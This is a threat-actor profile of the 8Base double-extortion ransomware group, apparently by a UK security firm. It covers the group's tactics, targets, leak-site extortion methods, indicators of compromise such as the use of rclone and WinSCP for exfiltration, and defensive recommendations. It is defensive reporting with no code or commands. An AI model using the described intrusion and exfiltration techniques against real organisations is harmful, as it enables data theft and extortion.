Threat Groups

8Base Ransomware Group – Threat Actor Profile

1. Overview

8Base is a rapidly emerging double extortion ransomware group that rose to prominence in mid-2023, following a dramatic surge in victim disclosures and leak site activity. The group has attracted attention for its visually distinctive leak site, aggressive extortion messaging, and strategic reuse of code and infrastructure from other ransomware families—most notably Phobos and RansomHouse.

Despite its relatively recent rise, 8Base has already claimed dozens of victims across multiple sectors, including professional services, construction, legal, manufacturing, logistics, and financial services. Its operations appear opportunistic, focusing on small and mid-sized enterprises (SMEs) with vulnerable perimeter services or poor internal segmentation.

2. Origin and Evolution

The first confirmed 8Base incidents were observed in early 2023, though some infrastructure and payload indicators suggest earlier testing campaigns in 2022. The group’s malware shares numerous similarities with Phobos ransomware, suggesting either a forked version of the code or close collaboration with former Phobos operators.

8Base has been highly active on its dark web leak site, publishing victim data in rapid succession throughout 2023 and into 2024. It operates a closed ransomware model, meaning there is no known affiliate programme, and all campaigns appear to be run by a central team or tightly controlled group of operators.

3. Tactics, Techniques, and Procedures (TTPs)

8Base’s attack patterns reflect classic double extortion methodology, but with rapid operational tempo and minimal lateral movement:

  • Initial Access:
    Via exposed RDP, VPNs without MFA, and email phishing with malicious attachments or macro-laden documents (T1566.001, T1078, T1190).
  • Privilege Escalation & Lateral Movement:
    Limited evidence of advanced movement. Often relies on stolen credentials and deployment from a single compromised endpoint. Occasional use of PsExec and RDP (T1021).
  • Data Exfiltration:
    Uses WinSCP, Rclone, and simple batch scripts to compress and exfiltrate high-value data to attacker-controlled storage (T1041).
  • Encryption:
    Payloads written in C/C++, believed to be derived from Phobos code. Encrypts user and network drives with extensions such as .8base, .crimson, or .lock. Ransom notes include contact instructions over encrypted messaging platforms like Tox or email.
  • Evasion & Persistence:
    Uses LOLBins (T1218), disables antivirus and logging tools, and deletes shadow copies via vssadmin or PowerShell (T1490).

4. Targeting Profile

8Base targets a broad range of organisations, typically selected based on ease of access and data value rather than sector alignment. Confirmed targeting includes:

  • Construction and engineering firms
  • Professional services and consultancies
  • Legal practices and accountancy firms
  • Regional logistics and transport companies
  • SMEs with exposed RDP or misconfigured firewall rules

UK-based companies—especially in legal and construction sectors—have been named on 8Base’s leak site, suggesting an increased focus on under-defended mid-sized businesses.

5. Notable Campaigns and Victims

While not as globally prominent as LockBit or Cl0p, 8Base has demonstrated a growing reach and disruptive impact. Publicly named victims include:

  • A UK regional legal services provider, with internal case files and HR data leaked.
  • A German manufacturing SME, where operational and CAD data were exfiltrated.
  • A US construction firm, with financial records and architectural diagrams exposed.

Victims are typically listed on the 8Base leak portal with:

  • Organisation name and logo
  • Sector classification
  • File samples for download
  • Countdown timers to full leak

6. Ransomware and Leak Site Behaviour

8Base runs a distinctive and well-branded leak site that mimics corporate design—complete with “About Us” and “Mission” statements. Their extortion tactics are forceful and include:

  1. Immediate publication of partial data to prove breach
  2. Warnings of full disclosure to the press or competitors
  3. Contact instructions via Tox, email, or chat portals
  4. Countdown clocks to full dataset release if negotiations stall

Ransom demands vary widely but typically range between £50,000 and £500,000, depending on victim size and data value.

7. Technical Indicators

Common IOCs and traits of 8Base include:

  • File extensions: .8base, .crimson, .lock
  • Ransom notes: info.txt, read_me.txt, or Restore-Your-Files.txt
  • Use of rclone.exe, 7z.exe, and WinSCP.exe for compression and exfiltration
  • Admin share abuse via net use and PsExec
  • Exfiltration destinations hosted in Eastern Europe

UK Cyber Defence Ltd maintains updated IOC packs and detection rules for subscribers.

8. Defensive Measures and Recommendations

To defend against 8Base ransomware:

  • Close or restrict RDP access, and enforce MFA across all remote services
  • Monitor for anomalous data compression or outbound transfer activity
  • Patch known vulnerabilities in VPNs, file transfer tools, and CMS platforms
  • Deploy EDR/XDR with behavioural detection, focusing on archive creation, PowerShell use, and admin tool abuse
  • Maintain offline backups, tested and secured with access controls
  • Implement data loss prevention (DLP) where appropriate

9. Attribution and Alliances

While no formal attribution has been made, code analysis shows strong links to Phobos, a ransomware strain long associated with Russian-language cybercriminal forums. 8Base may represent either a direct evolution of Phobos, or a closely aligned splinter group.

The group appears to operate independently, with no clear alliances to LockBit, Cl0p, or ALPHV, though it may share infrastructure or access brokers in the broader cybercrime ecosystem.

10. Conclusion

8Base is a fast-moving ransomware operation that exemplifies the modern trend toward streamlined, high-pressure extortion campaigns against lightly defended but data-rich enterprises. Its hybrid use of Phobos-based tooling and modern leak site strategy makes it a significant emerging threat, particularly for UK SMEs in professional and industrial sectors.

As with all double extortion operations, the best defence lies in limiting lateral movement, controlling sensitive data access, and being prepared to respond to both encryption and exposure.

Author:
Threat Intelligence Team, UK Cyber Defence Ltd
All intelligence current as of May 2025

  • 25 Views

you may also like

Kettering Health crippled by ransomware: 14 hospitals on emergency reroute

On May 20, 2025, Kettering Health’s network was hit by a ransomware attack, forcing 14 hospitals to switch to emergency reroutes and manual operations. The attack spread rapidly across critical systems due to undetected lateral movement, highlighting gaps in early threat detection. Patients reported suspicious calls, indicating potential data misuse. This incident underscores the urgent need for healthcare organizations to strengthen identity security, implement layered defenses, and prepare robust response plans.

Pro-Russian Cyber Activity: Hybrid Threats and the UK Response

An insights article assessing pro-Russian cyber activity with a situational briefing on hybrid threats to UK-aligned institutions. Includes a side-by-side comparison of key threat groups including KillNet, NoName057(16), and XakNet.

Donation-Based Ransomware Groups

An insights article comparing donation-model ransomware operators such as MalasLocker, exploring the ethics, tactics, and implications of threat actors who demand charitable giving instead of cryptocurrency payments.

Western Alliance Data Breach Tied to Cleo Software Flaw

Western Alliance Bank confirmed a data breach in April 2025 linked to a vulnerability in Cleo Integration Cloud. The breach, attributed to the Cl0p ransomware group, underscores the growing risks from third-party software vulnerabilities. Learn how the bank is responding and the increasing role of SOC in protecting financial institutions.

DBS Data Breach 2025: Ransomware Attack Exposes 11,000 Customers

An insights article examining the 2025 DBS data breach, focusing on how a ransomware attack on vendor Toppan Next Tech exposed thousands of customer records, and what it reveals about the growing threat of third-party supply chain vulnerabilities in the financial sector.

Emerging Ransomware Threats and Securing Open-Source Email Infrastructure

An insights article highlighting the rise of unconventional ransomware groups targeting open-source email platforms like Zimbra, including a technical bulletin with actionable guidance for UK organisations.

Stay Informed. Stay Secure.

Subscribe to our newsletter.
Linkedin-in
© 2025 CyberDefence